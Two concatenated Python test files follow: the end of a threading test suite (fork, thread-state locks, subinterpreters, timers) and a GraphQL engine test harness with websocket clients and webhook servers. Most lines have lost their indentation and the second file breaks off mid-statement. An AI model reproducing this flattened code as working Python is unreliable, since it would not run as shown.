th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
os.waitpid(pid, 0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
os.waitpid(pid, 0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0))
finish.release()
# When the thread ends, the tstate lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=5))
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertTrue(t._tstate_lock is None)
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
def test_locals_at_exit(self):
# Issue #19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "atexit"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'atexit'")
def test_warnings_at_exit(self):
# Issue #19466: try to call most destructors at Python shutdown before
# destroying Python thread states
filename = __file__
rc, out, err = assert_python_ok("-Wd", "-c", """if 1:
import time
import threading
def open_sleep():
# a warning will be emitted when the open file will be
# destroyed (without being explicitly closed) while the daemon
# thread is destroyed
fileobj = open(%a, 'rb')
start_event.set()
time.sleep(60.0)
start_event = threading.Event()
thread = threading.Thread(target=open_sleep)
thread.daemon = True
thread.start()
# wait until the thread started
start_event.wait()
""" % filename)
self.assertRegex(err.rstrip(),
b"^sys:1: ResourceWarning: unclosed file ")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
import warnings
# ignore "unclosed file ..." warnings
warnings.filterwarnings('ignore', '', ResourceWarning)
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
in_f = open(os.__file__, 'rb')
stuff = in_f.read(200)
null_f = open(os.devnull, 'wb')
null_f.write(stuff)
time.sleep(random.random() / 1995)
null_f.close()
in_f.close()
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(0)
else:
os._exit(1)
else:
_, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
code = r"""if 1:
import os
import threading
import time
class Sleeper:
def __del__(self):
time.sleep(0.05)
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
time.sleep(0.05)
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
""" % (w,)
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_daemon_threads_fatal_error(self):
subinterp_code = r"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep(10)
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
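
# A minimal sketch (not part of the test suite) of the pitfall the test above
# guards against: default argument values are evaluated once, so a mutable
# default is shared across calls unless each call gets a fresh object.
#
#     def buggy(acc=[]):
#         acc.append(1)   # mutates the single shared default list
#         return acc
#
#     buggy()  # -> [1]
#     buggy()  # -> [1, 1]  (state leaks between calls)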
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # A Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
if __name__ == "__main__":
unittest.main()
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config.
# As a workaround we store it in PytestConf.config.
class PytestConf():
pass
class HGECtxError(Exception):
pass
# NOTE: use this to generate a GraphQL client that uses the Apollo (subscriptions-transport-ws) sub-protocol
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
            self.ws_active_query_ids.discard(frame.get('id'))
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
            # Do init if headers are provided
self.init(headers)
elif not self.init_done:
self.init()
        if query_id is None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
            if json_msg.get('type') == 'stop':
                # Remove from active queries list
                self.ws_active_query_ids.discard(query_id)
            if query_id not in self.ws_id_query_queues:
                self.ws_id_query_queues[query_id] = queue.Queue(maxsize=-1)
            # Put event in the corresponding query_queue
            self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
            # Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
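
# A minimal usage sketch for GQLWsClient (assumes an `hge_ctx` such as the
# HGECtx instance constructed below; the subscription text is illustrative):
#
#     client = GQLWsClient(hge_ctx, '/v1/graphql')
#     client.init_as_admin()
#     events = client.send_query({'query': 'subscription { user { id } }'})
#     first = next(events)   # send_query is a generator of websocket events
#     client.teardown()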
# NOTE: use this to generate a GraphQL client that uses the `graphql-ws` sub-protocol
class GraphQLWSClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def get_queue(self):
return self.ws_queue.queue
def clear_queue(self):
self.ws_queue.queue.clear()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close, subprotocols=["graphql-transport-ws"])
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
print("HELLO", self.ws_active_query_ids)
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'complete':
            self.ws_active_query_ids.discard(frame.get('id'))
elif frame.get('type') == 'subscribe' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(5)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'complete'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
            # Do init if headers are provided
self.clear_queue()
self.init(headers)
elif not self.init_done:
self.init()
        if query_id is None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'subscribe',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
        if json_msg['type'] == 'ping':
            # Reply to server pings; send() expects a frame dict and handles
            # the JSON encoding itself.
            new_msg = json_msg
            new_msg['type'] = 'pong'
            self.send(new_msg)
return
if 'id' in json_msg:
query_id = json_msg['id']
            if json_msg.get('type') == 'complete':
                # Remove from active queries list
                self.ws_active_query_ids.discard(query_id)
            if query_id not in self.ws_id_query_queues:
                self.ws_id_query_queues[query_id] = queue.Queue(maxsize=-1)
            # Put event in the corresponding query_queue
            self.ws_id_query_queues[query_id].put(json_msg)
if json_msg['type'] != 'ping':
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def get_conn_close_state(self):
return self.remote_closed or self.is_closing
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
        for user_input in inputs:
            email_address = user_input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
    def get_users_by_email(self, singleUser=False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
        query = {
            'query': gql_query,
            'variables': {
                'email': email
            }
        }
        code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
        regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
        return re.search(regex, email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
# This endpoint just sleeps for 2 seconds:
elif req_path == "/sleep_2s":
time.sleep(2)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
# This is like a sleep endpoint above, but allowing us to decide
# externally when the webhook can return, with unblock()
elif req_path == "/block":
if not self.server.unblocked:
self.server.blocked_count += 1
with self.server.unblocked_wait:
# We expect this timeout never to be reached, but if
# something goes wrong the main thread will block forever:
self.server.unblocked_wait.wait(timeout=60)
self.server.blocked_count -= 1
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
# Data received from hasura by our web hook, pushed after it returns to the client:
self.resp_queue = queue.Queue()
# We use these two vars to coordinate unblocking in the /block route
self.unblocked = False
self.unblocked_wait = threading.Condition()
# ...and this for bookkeeping open blocked requests; this becomes
# meaningless after the first call to unblock()
self.blocked_count = 0
super().__init__(server_address, EvtsWebhookHandler)
# Unblock all webhook requests to /block. Idempotent.
def unblock(self):
self.unblocked = True
with self.unblocked_wait:
# NOTE: this only affects currently wait()-ing threads, future
# wait()s will block again (hence the simple self.unblocked flag)
self.unblocked_wait.notify_all()
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def is_queue_empty(self):
        return self.resp_queue.empty()
    def teardown(self):
        # Shut down this threaded HTTP server and release its socket.
        self.shutdown()
        self.server_close()
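
# A minimal sketch (hypothetical port; comments only) of how a test coordinates
# with the /block route above:
#
#     server = EvtsWebhookServer(('127.0.0.1', 5592))
#     threading.Thread(target=server.serve_forever, daemon=True).start()
#     # ... trigger an event whose webhook URL points at /block ...
#     server.unblock()                  # releases every handler wait()-ing
#     ev = server.get_event(timeout=10)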
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.hge_jwt_algo = self.hge_jwt_conf_dict["type"]
if self.hge_jwt_algo == "Ed25519":
self.hge_jwt_algo = "EdDSA"
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
# This will be GC'd, but we also explicitly dispose() in teardown()
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.inherited_roles_tests = config.getoption('--test-inherited-roles')
self.pro_tests = config.getoption('--pro-tests')
self.ws_client = GQLWsClient(self, '/v1/graphql')
self.ws_client_v1alpha1 = GQLWsClient(self, '/v1alpha1/graphql')
self.ws_client_relay = GQLWsClient(self, '/v1beta1/relay')
self.ws_client_graphql_ws = GraphQLWSClient(self, '/v1/graphql')
self.backend = config.getoption('--backend')
self.default_backend = 'postgres'
self.is_default_backend = self.backend == self.default_backend
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if self.is_default_backend and not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
